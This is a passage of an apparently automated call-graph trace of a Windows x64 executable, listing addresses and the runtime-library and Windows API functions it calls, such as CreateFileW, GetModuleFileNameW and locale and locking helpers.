7ff73a3fd61d GetProcAddress 13884->13888 13885->13889 13886->13884 13887 7ff73a3fd614 FreeLibrary 13886->13887 13887->13884 13889->13883 13889->13884 13889->13888 13890 7ff73a3fd5a1 LoadLibraryExW 13889->13890 13890->13886 13890->13889 13892 7ff73a3f8150 13891->13892 13908 7ff73a401f68 13892->13908 13894 7ff73a3f815c 13914 7ff73a3f7f4c 13894->13914 13896 7ff73a3f8ab0 7 API calls 13897 7ff73a3f81f5 13896->13897 13897->13348 13898 7ff73a3f8174 _RTC_Initialize 13906 7ff73a3f81c9 13898->13906 13919 7ff73a3f80fc 13898->13919 13900 7ff73a3f8189 13922 7ff73a401448 13900->13922 13904 7ff73a3f819e 13905 7ff73a402638 45 API calls 13904->13905 13905->13906 13906->13896 13907 7ff73a3f81e5 13906->13907 13907->13348 13909 7ff73a401f79 13908->13909 13910 7ff73a401f81 13909->13910 13911 7ff73a4006a8 _set_fmode 11 API calls 13909->13911 13910->13894 13912 7ff73a401f90 13911->13912 13913 7ff73a3ff728 _invalid_parameter_noinfo 37 API calls 13912->13913 13913->13910 13915 7ff73a3f7f5d 13914->13915 13918 7ff73a3f7f62 __scrt_release_startup_lock 13914->13918 13916 7ff73a3f8ab0 7 API calls 13915->13916 13915->13918 13917 7ff73a3f7fd6 13916->13917 13918->13898 13956 7ff73a3f80c0 13919->13956 13921 7ff73a3f8105 13921->13900 13923 7ff73a3f8195 13922->13923 13924 7ff73a401468 13922->13924 13923->13906 13955 7ff73a3f8db0 InitializeSListHead 13923->13955 13925 7ff73a401486 13924->13925 13926 7ff73a401470 13924->13926 13927 7ff73a40b8d8 66 API calls 13925->13927 13928 7ff73a4006a8 _set_fmode 11 API calls 13926->13928 13929 7ff73a40148b 13927->13929 13930 7ff73a401475 13928->13930 13971 7ff73a40afbc GetModuleFileNameW 13929->13971 13931 7ff73a3ff728 _invalid_parameter_noinfo 37 API calls 13930->13931 13931->13923 13938 7ff73a401515 13940 7ff73a401220 45 API calls 13938->13940 13939 7ff73a4014fd 13941 7ff73a4006a8 _set_fmode 11 API calls 13939->13941 13947 7ff73a401531 13940->13947 13942 7ff73a401502 13941->13942 13943 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 13942->13943 13945 7ff73a401510 13943->13945 13944 7ff73a401537 13946 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 13944->13946 13945->13923 13946->13923 13947->13944 13948 7ff73a401563 13947->13948 13949 7ff73a40157c 13947->13949 13950 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 13948->13950 13951 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 13949->13951 13952 7ff73a40156c 13950->13952 13951->13944 13953 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 13952->13953 13954 7ff73a401578 13953->13954 13954->13923 13957 7ff73a3f80d3 13956->13957 13958 7ff73a3f80da 13956->13958 13957->13921 13960 7ff73a401be0 13958->13960 13963 7ff73a40181c 13960->13963 13970 7ff73a3fff30 EnterCriticalSection 13963->13970 13972 7ff73a40b001 GetLastError 13971->13972 13973 7ff73a40b015 13971->13973 13995 7ff73a40061c 13972->13995 13974 7ff73a4006c8 TranslateName 45 API calls 13973->13974 13976 7ff73a40b043 13974->13976 13977 7ff73a40b054 13976->13977 14000 7ff73a406614 13976->14000 14003 7ff73a40097c 13977->14003 13978 7ff73a3f7e70 _log10_special 8 API calls 13980 7ff73a4014a2 13978->13980 13983 7ff73a401220 13980->13983 13982 7ff73a40b00e 13982->13978 13985 7ff73a40125e 13983->13985 13987 7ff73a4012ca 13985->13987 14017 7ff73a40bc88 13985->14017 13986 7ff73a4013bb 13989 7ff73a4013e8 13986->13989 13987->13986 13988 7ff73a40bc88 45 API calls 13987->13988 13988->13987 13990 7ff73a401400 13989->13990 13991 7ff73a401438 13989->13991 13990->13991 13992 7ff73a4062d4 __std_fs_code_page 11 API calls 13990->13992 13991->13938 13991->13939 13993 7ff73a40142e 13992->13993 13994 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 13993->13994 13994->13991 13996 7ff73a404aa4 _set_fmode 11 API calls 13995->13996 13997 7ff73a400629 Concurrency::details::SchedulerProxy::DeleteThis 13996->13997 13998 7ff73a404aa4 _set_fmode 11 API calls 13997->13998 13999 7ff73a40064b 13998->13999 13999->13982 14001 7ff73a406400 __crtLCMapStringW 5 API calls 14000->14001 14002 7ff73a406634 14001->14002 14002->13977 14004 7ff73a4009a0 14003->14004 14005 7ff73a4009bb 14003->14005 14004->13982 14006 7ff73a40a370 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 14005->14006 14010 7ff73a4009c0 14005->14010 14007 7ff73a400a17 14006->14007 14009 7ff73a400a1e GetLastError 14007->14009 14007->14010 14011 7ff73a400a49 14007->14011 14008 7ff73a4006a8 _set_fmode 11 API calls 14008->14004 14012 7ff73a40061c _fread_nolock 11 API calls 14009->14012 14010->14004 14010->14008 14013 7ff73a40a370 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 14011->14013 14014 7ff73a400a2b 14012->14014 14015 7ff73a400a70 14013->14015 14016 7ff73a4006a8 _set_fmode 11 API calls 14014->14016 14015->14004 14015->14009 14016->14004 14018 7ff73a40bc14 14017->14018 14019 7ff73a4006c8 TranslateName 45 API calls 14018->14019 14020 7ff73a40bc38 14019->14020 14020->13985 14022 7ff73a3f8c0f GetStartupInfoW 14021->14022 14022->13328 14024 7ff73a3f5f5d 14023->14024 14027 7ff73a3f5ddf 14023->14027 14260 7ff73a3f1230 14024->14260 14028 7ff73a3f5e61 14027->14028 14029 7ff73a3f5e8d 14027->14029 14033 7ff73a3f5e45 ctype 14027->14033 14036 7ff73a3f5f57 14027->14036 14028->14036 14245 7ff73a3f7e98 14028->14245 14031 7ff73a3f7e98 std::_Facet_Register 39 API calls 14029->14031 14031->14033 14034 7ff73a3f5efb ctype 14033->14034 14035 7ff73a3ff748 _invalid_parameter_noinfo_noreturn 37 API calls 14033->14035 14034->13360 14035->14036 14254 7ff73a3f1190 14036->14254 14290 7ff73a3f6aa4 GetModuleHandleW GetProcAddress 14037->14290 14040 7ff73a3f6d3c GetFileAttributesW 14042 7ff73a3f6d4a 14040->14042 14044 7ff73a3f2949 14040->14044 14041 7ff73a3f6d2c GetLastError 14041->14044 14043 7ff73a3f6d54 14042->14043 14042->14044 14292 7ff73a3f6db0 CreateFileW 14043->14292 14052 7ff73a3f4590 14044->14052 14047 7ff73a3f6d84 14047->14044 14048 7ff73a3f6d7a CloseHandle 14048->14047 14049 7ff73a3f6da8 14048->14049 14050 7ff73a3ffe88 BuildCatchObjectHelperInternal 45 API calls 14049->14050 14051 7ff73a3f6dad 14050->14051 14053 7ff73a3f45bd 14052->14053 14054 7ff73a3f45a2 14052->14054 14055 7ff73a3f45d2 14053->14055 14056 7ff73a3f5db0 39 API calls 14053->14056 14054->13365 14055->13365 14057 7ff73a3f4613 14056->14057 14057->13365 14295 7ff73a3ff7c0 14058->14295 14061 7ff73a3f6b06 AreFileApisANSI 14062 7ff73a3f29cd 14061->14062 14062->13369 14062->13370 14159 7ff73a3f6b1c 14062->14159 14064 7ff73a3f5202 14063->14064 14067 7ff73a3f51c3 ctype 14063->14067 14300 7ff73a3f60e0 14064->14300 14066 7ff73a3f5218 14066->13381 14067->13381 14069 7ff73a3f7e98 std::_Facet_Register 39 API calls 14068->14069 14070 7ff73a3f4e2f 14069->14070 14314 7ff73a3f7204 14070->14314 14075 7ff73a3f4e79 14076 7ff73a3f7e98 std::_Facet_Register 39 API calls 14075->14076 14077 7ff73a3f4efa 14076->14077 14078 7ff73a3f7204 55 API calls 14077->14078 14080 7ff73a3f4f0a 14078->14080 14079 7ff73a3f50f1 14082 7ff73a3f1e40 81 API calls 14079->14082 14343 7ff73a3f761c 14080->14343 14084 7ff73a3f5131 14082->14084 14087 7ff73a3f9d80 Concurrency::cancel_current_task 2 API calls 14084->14087 14085 7ff73a3f50be 14089 7ff73a3f505d 14085->14089 14093 7ff73a3f5142 14085->14093 14086 7ff73a3f4f8a 14351 7ff73a3fe3f4 14086->14351 14087->14093 14091 7ff73a3f7e70 _log10_special 8 API calls 14089->14091 14092 7ff73a3f2b72 14091->14092 14092->13387 14099 7ff73a3f4370 14092->14099 14095 7ff73a3f1e40 81 API calls 14093->14095 14096 7ff73a3f5184 14095->14096 14097 7ff73a3f9d80 Concurrency::cancel_current_task 2 API calls 14096->14097 14098 7ff73a3f5195 14097->14098 14100 7ff73a3f43b1 14099->14100 14101 7ff73a3f43c6 14100->14101 14784 7ff73a3f5290 14100->14784 14103 7ff73a3f44af 14101->14103 14105 7ff73a3f4471 14101->14105 14107 7ff73a3f1e40 81 API calls 14103->14107 14104 7ff73a3f4482 14104->13392 14105->14104 14798 7ff73a3f53f0 14105->14798 14108 7ff73a3f44f1 14107->14108 14109 7ff73a3f9d80 Concurrency::cancel_current_task 2 API calls 14108->14109 14110 7ff73a3f4502 14109->14110 14110->13392 14112 7ff73a3f4c3a 14111->14112 14113 7ff73a3f4c8a 14111->14113 14809 7ff73a3f4b30 14112->14809 14113->13387 14115 7ff73a3f4c74 14116 7ff73a3fe074 74 API calls 14115->14116 14116->14113 14118 7ff73a3f5da4 14117->14118 14121 7ff73a3f5cd6 14117->14121 14119 7ff73a3f1230 39 API calls 14118->14119 14120 7ff73a3f5daa 14119->14120 14122 7ff73a3f5cdc ctype 14121->14122 14123 7ff73a3f5d65 14121->14123 14124 7ff73a3f5d0c 14121->14124 14122->13391 14127 7ff73a3f7e98 std::_Facet_Register 39 API calls 14123->14127 14125 7ff73a3f7e98 std::_Facet_Register 39 API calls 14124->14125 14126 7ff73a3f5d9e 14124->14126 14128 7ff73a3f5d22 14125->14128 14129 7ff73a3f1190 Concurrency::cancel_current_task 39 API calls 14126->14129 14127->14122 14128->14122 14130 7ff73a3ff748 _invalid_parameter_noinfo_noreturn 37 API calls 14128->14130 14129->14118 14130->14126 14135 7ff73a3f574f 14131->14135 14137 7ff73a3f5746 14131->14137 14132 7ff73a3f584e 14133 7ff73a3f1230 39 API calls 14132->14133 14134 7ff73a3f5854 14133->14134 14135->14132 14136 7ff73a3f5848 14135->14136 14135->14137 14138 7ff73a3f5794 14135->14138 14139 7ff73a3f57ec 14135->14139 14140 7ff73a3f1190 Concurrency::cancel_current_task 39 API calls 14136->14140 14137->13396 14137->14137 14138->14136 14142 7ff73a3f7e98 std::_Facet_Register 39 API calls 14138->14142 14141 7ff73a3f7e98 std::_Facet_Register 39 API calls 14139->14141 14140->14132 14141->14137 14143 7ff73a3f57a9 14142->14143 14143->14137 14144 7ff73a3ff748 _invalid_parameter_noinfo_noreturn 37 API calls 14143->14144 14144->14136 14148 7ff73a3f645c 14145->14148 14146 7ff73a3f6618 14147 7ff73a3f1230 39 API calls 14146->14147 14149 7ff73a3f661e 14147->14149 14148->14146 14150 7ff73a3f6612 14148->14150 14152 7ff73a3f6581 14148->14152 14153 7ff73a3f65a9 14148->14153 14157 7ff73a3f6461 ctype 14148->14157 14151 7ff73a3f1190 Concurrency::cancel_current_task 39 API calls 14150->14151 14151->14146 14152->14150 14155 7ff73a3f7e98 std::_Facet_Register 39 API calls 14152->14155 14154 7ff73a3f7e98 std::_Facet_Register 39 API calls 14153->14154 14154->14157 14156 7ff73a3f6596 14155->14156 14156->14157 14158 7ff73a3ff748 _invalid_parameter_noinfo_noreturn 37 API calls 14156->14158 14157->13409 14158->14150 14160 7ff73a3f6b43 14159->14160 14161 7ff73a3f6b9a WideCharToMultiByte 14159->14161 14160->14161 14163 7ff73a3f6b4b WideCharToMultiByte 14160->14163 14162 7ff73a3f6bcb 14161->14162 14164 7ff73a3f6bcf GetLastError 14162->14164 14165 7ff73a3f6bd7 14162->14165 14163->14162 14166 7ff73a3f2a11 14163->14166 14164->14165 14165->14166 14167 7ff73a3f6be4 WideCharToMultiByte 14165->14167 14166->13373 14169 7ff73a3f6620 14166->14169 14167->14166 14168 7ff73a3f6c11 GetLastError 14167->14168 14168->14166 14170 7ff73a3f662d 14169->14170 14171 7ff73a3f6644 14169->14171 14170->13380 14174 7ff73a3f665e __scrt_get_show_window_mode 14171->14174 14838 7ff73a3f6850 14171->14838 14173 7ff73a3f66a9 14173->13380 14174->13380 14176 7ff73a3f6848 14175->14176 14179 7ff73a3f66e9 14175->14179 14177 7ff73a3f1230 39 API calls 14176->14177 14178 7ff73a3f684e 14177->14178 14180 7ff73a3f6762 14179->14180 14181 7ff73a3f678e 14179->14181 14185 7ff73a3f6747 ctype 14179->14185 14187 7ff73a3f6842 14179->14187 14184 7ff73a3f7e98 std::_Facet_Register 39 API calls 14180->14184 14180->14187 14183 7ff73a3f7e98 std::_Facet_Register 39 API calls 14181->14183 14182 7ff73a3f1190 Concurrency::cancel_current_task 39 API calls 14182->14176 14183->14185 14184->14185 14186 7ff73a3ff748 _invalid_parameter_noinfo_noreturn 37 API calls 14185->14186 14188 7ff73a3f67ff ctype 14185->14188 14186->14187 14187->14182 14188->13404 14190 7ff73a3f5b4e 14189->14190 14193 7ff73a3f59ce 14189->14193 14191 7ff73a3f1230 39 API calls 14190->14191 14192 7ff73a3f5b54 14191->14192 14194 7ff73a3f5b48 14193->14194 14195 7ff73a3f5a50 14193->14195 14196 7ff73a3f5a7c 14193->14196 14201 7ff73a3f5a34 ctype 14193->14201 14197 7ff73a3f1190 Concurrency::cancel_current_task 39 API calls 14194->14197 14195->14194 14199 7ff73a3f7e98 std::_Facet_Register 39 API calls 14195->14199 14198 7ff73a3f7e98 std::_Facet_Register 39 API calls 14196->14198 14197->14190 14198->14201 14199->14201 14200 7ff73a3ff748 _invalid_parameter_noinfo_noreturn 37 API calls 14200->14194 14201->14200 14202 7ff73a3f5af5 ctype 14201->14202 14202->13407 14204 7ff73a3f40bd 14203->14204 14205 7ff73a3f4c20 79 API calls 14204->14205 14206 7ff73a3f40fa 14204->14206 14205->14206 14206->13419 14208 7ff73a3ff5c0 _invalid_parameter_noinfo 37 API calls 14207->14208 14209 7ff73a3ff761 14208->14209 14210 7ff73a3ff778 _invalid_parameter_noinfo_noreturn 17 API calls 14209->14210 14211 7ff73a3ff776 14210->14211 14852 7ff73a3f4680 14212->14852 14220 7ff73a3f1673 14219->14220 14221 7ff73a3f9d80 Concurrency::cancel_current_task 2 API calls 14220->14221 14222 7ff73a3f169b 14221->14222 14223 7ff73a3f9b3c __std_exception_copy 37 API calls 14222->14223 14224 7ff73a3f16cd 14223->14224 14224->13373 14226 7ff73a3f19e0 14225->14226 14227 7ff73a3f9d80 Concurrency::cancel_current_task 2 API calls 14226->14227 14228 7ff73a3f1a08 14227->14228 14230 7ff73a3f1e70 14229->14230 14230->14230 14231 7ff73a3f5cb0 39 API calls 14230->14231 14232 7ff73a3f1e84 14231->14232 14233 7ff73a3f1340 81 API calls 14232->14233 14234 7ff73a3f1e9d 14233->14234 14235 7ff73a3f1ed2 14234->14235 14236 7ff73a3ff748 _invalid_parameter_noinfo_noreturn 37 API calls 14234->14236 14235->13397 14237 7ff73a3f1ef4 14236->14237 14238 7ff73a3f9b3c __std_exception_copy 37 API calls 14237->14238 14239 7ff73a3f1f2d 14238->14239 14239->13397 14243 7ff73a3f9d9f 14240->14243 14241 7ff73a3f9dea RaiseException 14241->13401 14242 7ff73a3f9dc8 RtlPcToFileHeader 14244 7ff73a3f9de0 14242->14244 14243->14241 14243->14242 14244->14241 14246 7ff73a3f7ea3 14245->14246 14247 7ff73a3f7ebc 14246->14247 14248 7ff73a400d10 std::_Facet_Register 2 API calls 14246->14248 14249 7ff73a3f7ec2 14246->14249 14247->14033 14248->14246 14252 7ff73a3f7ecd 14249->14252 14265 7ff73a3f8a7c 14249->14265 14251 7ff73a3f1190 Concurrency::cancel_current_task 39 API calls 14253 7ff73a3f7ed3 14251->14253 14252->14251 14255 7ff73a3f119e Concurrency::cancel_current_task 14254->14255 14256 7ff73a3f9d80 Concurrency::cancel_current_task 2 API calls 14255->14256 14257 7ff73a3f11af 14256->14257 14269 7ff73a3f9b3c 14257->14269 14259 7ff73a3f11d9 14259->14024 14282 7ff73a3f7020 14260->14282 14266 7ff73a3f8a8a std::bad_alloc::bad_alloc 14265->14266 14267 7ff73a3f9d80 Concurrency::cancel_current_task 2 API calls 14266->14267 14268 7ff73a3f8a9b 14267->14268 14270 7ff73a3f9b92 __vcrt_freefls 14269->14270 14271 7ff73a3f9b5d 14269->14271 14270->14259 14271->14270 14273 7ff73a4039e0 14271->14273 14274 7ff73a4039ed 14273->14274 14275 7ff73a4039f7 14273->14275 14274->14275 14277 7ff73a403a12 14274->14277 14276 7ff73a4006a8 _set_fmode 11 API calls 14275->14276 14281 7ff73a4039fe 14276->14281 14278 7ff73a403a0a 14277->14278 14280 7ff73a4006a8 _set_fmode 11 API calls 14277->14280 14278->14270 14279 7ff73a3ff728 _invalid_parameter_noinfo 37 API calls 14279->14278 14280->14281 14281->14279 14287 7ff73a3f6f54 14282->14287 14285 7ff73a3f9d80 Concurrency::cancel_current_task 2 API calls 14286 7ff73a3f7042 14285->14286 14288 7ff73a3f9b3c __std_exception_copy 37 API calls 14287->14288 14289 7ff73a3f6f88 14288->14289 14289->14285 14291 7ff73a3f6ae6 14290->14291 14291->14040 14291->14041 14293 7ff73a3f6df2 GetLastError 14292->14293 14294 7ff73a3f6d6d 14292->14294 14293->14294 14294->14047 14294->14048 14296 7ff73a40492c __std_fs_code_page 45 API calls 14295->14296 14297 7ff73a3ff7c9 14296->14297 14298 7ff73a408a64 __std_fs_code_page 45 API calls 14297->14298 14299 7ff73a3f6afd 14298->14299 14299->14061 14299->14062 14301 7ff73a3f6267 14300->14301 14304 7ff73a3f610e 14300->14304 14302 7ff73a3f1230 39 API calls 14301->14302 14303 7ff73a3f626d 14302->14303 14303->14066 14306 7ff73a3f616b 14304->14306 14307 7ff73a3f61a7 14304->14307 14312 7ff73a3f615e ctype 14304->14312 14305 7ff73a3f7e98 std::_Facet_Register 39 API calls 14305->14312 14306->14305 14308 7ff73a3f6261 14306->14308 14309 7ff73a3f7e98 std::_Facet_Register 39 API calls 14307->14309 14311 7ff73a3f1190 Concurrency::cancel_current_task 39 API calls 14308->14311 14309->14312 14310 7ff73a3ff748 _invalid_parameter_noinfo_noreturn 37 API calls 14310->14308 14311->14301 14312->14310 14313 7ff73a3f620f ctype 14312->14313 14313->14066 14376 7ff73a3f6e4c 14314->14376 14316 7ff73a3f7226 14321 7ff73a3f7249 ctype __vcrt_freefls 14316->14321 14384 7ff73a3f73fc 14316->14384 14319 7ff73a3f723e 14387 7ff73a3f742c 14319->14387 14380 7ff73a3f6ec4 14321->14380 14322 7ff73a3f4e3f 14323 7ff73a3f54a0 14322->14323 14324 7ff73a3f54df 14323->14324 14325 7ff73a3f6e4c std::_Lockit::_Lockit 6 API calls 14324->14325 14326 7ff73a3f54ec 14325->14326 14327 7ff73a3f6e4c std::_Lockit::_Lockit 6 API calls 14326->14327 14331 7ff73a3f553b 14326->14331 14329 7ff73a3f5511 14327->14329 14328 7ff73a3f5585 14330 7ff73a3f6ec4 std::_Lockit::~_Lockit LeaveCriticalSection 14328->14330 14332 7ff73a3f6ec4 std::_Lockit::~_Lockit LeaveCriticalSection 14329->14332 14339 7ff73a3f55cf 14330->14339 14331->14328 14420 7ff73a3f1b30 14331->14420 14332->14331 14335 7ff73a3f55a3 14448 7ff73a3f71c4 14335->14448 14336 7ff73a3f5624 14451 7ff73a3f1a40 14336->14451 14341 7ff73a3f7e70 _log10_special 8 API calls 14339->14341 14342 7ff73a3f4e5b 14341->14342 14342->14075 14342->14079 14344 7ff73a3f7662 14343->14344 14350 7ff73a3f4f7e 14344->14350 14483 7ff73a4003b0 14344->14483 14348 7ff73a3f76b0 14348->14350 14506 7ff73a3fe074 14348->14506 14350->14085 14350->14086 14352 7ff73a3fe3fd 14351->14352 14356 7ff73a3f4fff 14351->14356 14353 7ff73a4006a8 _set_fmode 11 API calls 14352->14353 14354 7ff73a3fe402 14353->14354 14355 7ff73a3ff728 _invalid_parameter_noinfo 37 API calls 14354->14355 14355->14356 14357 7ff73a3f5860 14356->14357 14358 7ff73a3f6e4c std::_Lockit::_Lockit 6 API calls 14357->14358 14359 7ff73a3f5890 14358->14359 14360 7ff73a3f6e4c std::_Lockit::_Lockit 6 API calls 14359->14360 14365 7ff73a3f58df 14359->14365 14361 7ff73a3f58b5 14360->14361 14366 7ff73a3f6ec4 std::_Lockit::~_Lockit LeaveCriticalSection 14361->14366 14362 7ff73a3f592c 14363 7ff73a3f6ec4 std::_Lockit::~_Lockit LeaveCriticalSection 14362->14363 14364 7ff73a3f5970 14363->14364 14367 7ff73a3f7e70 _log10_special 8 API calls 14364->14367 14365->14362 14764 7ff73a3f6290 14365->14764 14366->14365 14368 7ff73a3f5980 14367->14368 14368->14089 14371 7ff73a3f5993 14373 7ff73a3f1a40 Concurrency::cancel_current_task 39 API calls 14371->14373 14372 7ff73a3f5944 14374 7ff73a3f71c4 std::_Facet_Register 39 API calls 14372->14374 14375 7ff73a3f5998 14373->14375 14374->14362 14377 7ff73a3f6e5b 14376->14377 14378 7ff73a3f6e60 14376->14378 14391 7ff73a3fffa0 14377->14391 14378->14316 14381 7ff73a3f6ecf LeaveCriticalSection 14380->14381 14382 7ff73a3f6ed8 14380->14382 14382->14322 14385 7ff73a3f7e98 std::_Facet_Register 39 API calls 14384->14385 14386 7ff73a3f740e 14385->14386 14386->14319 14388 7ff73a3f7451 14387->14388 14389 7ff73a3f743e 14387->14389 14388->14321 14415 7ff73a3f7a3c 14389->14415 14394 7ff73a406ae8 14391->14394 14395 7ff73a406400 __crtLCMapStringW 5 API calls 14394->14395 14396 7ff73a406b08 14395->14396 14397 7ff73a406400 __crtLCMapStringW 5 API calls 14396->14397 14398 7ff73a406b27 14397->14398 14399 7ff73a406400 __crtLCMapStringW 5 API calls 14398->14399 14400 7ff73a406b46 14399->14400 14401 7ff73a406400 __crtLCMapStringW 5 API calls 14400->14401 14402 7ff73a406b65 14401->14402 14403 7ff73a406400 __crtLCMapStringW 5 API calls 14402->14403 14404 7ff73a406b84 14403->14404 14405 7ff73a406400 __crtLCMapStringW 5 API calls 14404->14405 14406 7ff73a406ba3 14405->14406 14407 7ff73a406400 __crtLCMapStringW 5 API calls 14406->14407 14408 7ff73a406bc2 14407->14408 14409 7ff73a406400 __crtLCMapStringW 5 API calls 14408->14409 14410 7ff73a406be1 14409->14410 14411 7ff73a406400 __crtLCMapStringW 5 API calls 14410->14411 14412 7ff73a406c00 14411->14412 14413 7ff73a406400 __crtLCMapStringW 5 API calls 14412->14413 14414 7ff73a406c1f 14413->14414 14416 7ff73a3f7a71 14415->14416 14417 7ff73a3f7a4a EncodePointer 14415->14417 14418 7ff73a3ffe88 BuildCatchObjectHelperInternal 45 API calls 14416->14418 14417->14388 14419 7ff73a3f7a76 14418->14419 14421 7ff73a3f1c90 14420->14421 14422 7ff73a3f1b5c 14420->14422 14421->14335 14421->14336 14422->14421 14423 7ff73a3f7e98 std::_Facet_Register 39 API calls 14422->14423 14424 7ff73a3f1b6f 14423->14424 14425 7ff73a3f6e4c std::_Lockit::_Lockit 6 API calls 14424->14425 14426 7ff73a3f1ba0 14425->14426 14427 7ff73a3f1cae 14426->14427 14428 7ff73a3f1bdc 14426->14428 14462 7ff73a3f7044 14427->14462 14457 7ff73a3f7374 14428->14457 14449 7ff73a3f7e98 std::_Facet_Register 39 API calls 14448->14449 14450 7ff73a3f71d7 14449->14450 14450->14328 14452 7ff73a3f1a4e Concurrency::cancel_current_task 14451->14452 14453 7ff73a3f9d80 Concurrency::cancel_current_task 2 API calls 14452->14453 14454 7ff73a3f1a5f 14453->14454 14455 7ff73a3f9b3c __std_exception_copy 37 API calls 14454->14455 14456 7ff73a3f1a89 14455->14456 14467 7ff73a4002a8 14457->14467 14480 7ff73a3f6fd8 14462->14480 14465 7ff73a3f9d80 Concurrency::cancel_current_task 2 API calls 14466 7ff73a3f7066 14465->14466 14468 7ff73a406ae8 std::_Locinfo::_Locinfo_ctor 5 API calls 14467->14468 14469 7ff73a4002be 14468->14469 14472 7ff73a3fffcc 14469->14472 14479 7ff73a3fff30 EnterCriticalSection 14472->14479 14481 7ff73a3f9b3c __std_exception_copy 37 API calls 14480->14481 14482 7ff73a3f700c 14481->14482 14482->14465 14484 7ff73a4002f4 14483->14484 14485 7ff73a400311 14484->14485 14488 7ff73a40033d 14484->14488 14486 7ff73a4006a8 _set_fmode 11 API calls 14485->14486 14487 7ff73a400316 14486->14487 14489 7ff73a3ff728 _invalid_parameter_noinfo 37 API calls 14487->14489 14490 7ff73a400342 14488->14490 14491 7ff73a40034f 14488->14491 14495 7ff73a3f7695 14489->14495 14492 7ff73a4006a8 _set_fmode 11 API calls 14490->14492 14510 7ff73a405fc8 14491->14510 14492->14495 14495->14350 14502 7ff73a3ff308 14495->14502 14496 7ff73a400363 14498 7ff73a4006a8 _set_fmode 11 API calls 14496->14498 14497 7ff73a400370 14517 7ff73a409a44 14497->14517 14498->14495 14500 7ff73a400384 14522 7ff73a3fe448 LeaveCriticalSection 14500->14522 14503 7ff73a3ff338 14502->14503 14741 7ff73a3ff000 14503->14741 14505 7ff73a3ff354 14505->14348 14507 7ff73a3fe0a4 14506->14507 14753 7ff73a3fdf50 14507->14753 14509 7ff73a3fe0bd 14509->14350 14523 7ff73a3fff30 EnterCriticalSection 14510->14523 14512 7ff73a405fdf 14513 7ff73a40603c 19 API calls 14512->14513 14514 7ff73a405fea 14513->14514 14515 7ff73a3fff84 BuildCatchObjectHelperInternal LeaveCriticalSection 14514->14515 14516 7ff73a400359 14515->14516 14516->14496 14516->14497 14524 7ff73a409780 14517->14524 14520 7ff73a409a9e 14520->14500 14529 7ff73a4097aa 14524->14529 14525 7ff73a4006a8 _set_fmode 11 API calls 14526 7ff73a409a23 14525->14526 14527 7ff73a3ff728 _invalid_parameter_noinfo 37 API calls 14526->14527 14528 7ff73a409966 14527->14528 14528->14520 14536 7ff73a40feb4 14528->14536 14534 7ff73a40995d 14529->14534 14539 7ff73a40f688 14529->14539 14531 7ff73a4099be 14532 7ff73a40f688 45 API calls 14531->14532 14531->14534 14533 7ff73a4099df 14532->14533 14533->14534 14535 7ff73a40f688 45 API calls 14533->14535 14534->14525 14534->14528 14535->14534 14554 7ff73a40f788 14536->14554 14540 7ff73a40f695 14539->14540 14545 7ff73a40f6cb 14539->14545 14542 7ff73a4006a8 _set_fmode 11 API calls 14540->14542 14543 7ff73a40f63c 14540->14543 14541 7ff73a40f6f5 14544 7ff73a4006a8 _set_fmode 11 API calls 14541->14544 14546 7ff73a40f69f 14542->14546 14543->14531 14547 7ff73a40f6fa 14544->14547 14545->14541 14548 7ff73a40f71a 14545->14548 14549 7ff73a3ff728 _invalid_parameter_noinfo 37 API calls 14546->14549 14551 7ff73a3ff728 _invalid_parameter_noinfo 37 API calls 14547->14551 14552 7ff73a4006c8 TranslateName 45 API calls 14548->14552 14553 7ff73a40f705 14548->14553 14550 7ff73a40f6aa 14549->14550 14550->14531 14551->14553 14552->14553 14553->14531 14555 7ff73a40f7bd 14554->14555 14556 7ff73a40f79f 14554->14556 14555->14556 14559 7ff73a40f7d9 14555->14559 14557 7ff73a4006a8 _set_fmode 11 API calls 14556->14557 14558 7ff73a40f7a4 14557->14558 14560 7ff73a3ff728 _invalid_parameter_noinfo 37 API calls 14558->14560 14565 7ff73a40fd98 14559->14565 14563 7ff73a40f7b0 14560->14563 14563->14520 14566 7ff73a4006c8 TranslateName 45 API calls 14565->14566 14567 7ff73a40fdeb 14566->14567 14568 7ff73a406614 5 API calls 14567->14568 14570 7ff73a40fdfb 14567->14570 14568->14570 14577 7ff73a400800 14570->14577 14572 7ff73a40fe57 14574 7ff73a40f804 14572->14574 14575 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14572->14575 14574->14563 14576 7ff73a40c2d4 LeaveCriticalSection 14574->14576 14575->14574 14578 7ff73a40084e 14577->14578 14579 7ff73a40082a 14577->14579 14580 7ff73a400853 14578->14580 14581 7ff73a4008a8 14578->14581 14583 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14579->14583 14585 7ff73a400839 14579->14585 14584 7ff73a400868 14580->14584 14580->14585 14586 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14580->14586 14582 7ff73a40a2e0 _fread_nolock MultiByteToWideChar 14581->14582 14592 7ff73a4008c4 14582->14592 14583->14585 14587 7ff73a408e50 std::_Locinfo::_Locinfo_ctor 12 API calls 14584->14587 14585->14572 14599 7ff73a40fee8 14585->14599 14586->14584 14587->14585 14588 7ff73a4008cb GetLastError 14590 7ff73a40061c _fread_nolock 11 API calls 14588->14590 14589 7ff73a400906 14589->14585 14594 7ff73a40a2e0 _fread_nolock MultiByteToWideChar 14589->14594 14591 7ff73a4008d8 14590->14591 14595 7ff73a4006a8 _set_fmode 11 API calls 14591->14595 14592->14588 14592->14589 14593 7ff73a4008f9 14592->14593 14596 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 14592->14596 14597 7ff73a408e50 std::_Locinfo::_Locinfo_ctor 12 API calls 14593->14597 14598 7ff73a40094a 14594->14598 14595->14585 14596->14593 14597->14589 14598->14585 14598->14588 14642 7ff73a40facc 14599->14642 14602 7ff73a40ff5d 14674 7ff73a400688 14602->14674 14603 7ff73a40ff75 14662 7ff73a40c2fc 14603->14662 14606 7ff73a40ff62 14613 7ff73a4006a8 _set_fmode 11 API calls 14606->14613 14608 7ff73a40ff9a CreateFileW 14611 7ff73a410080 GetFileType 14608->14611 14612 7ff73a410005 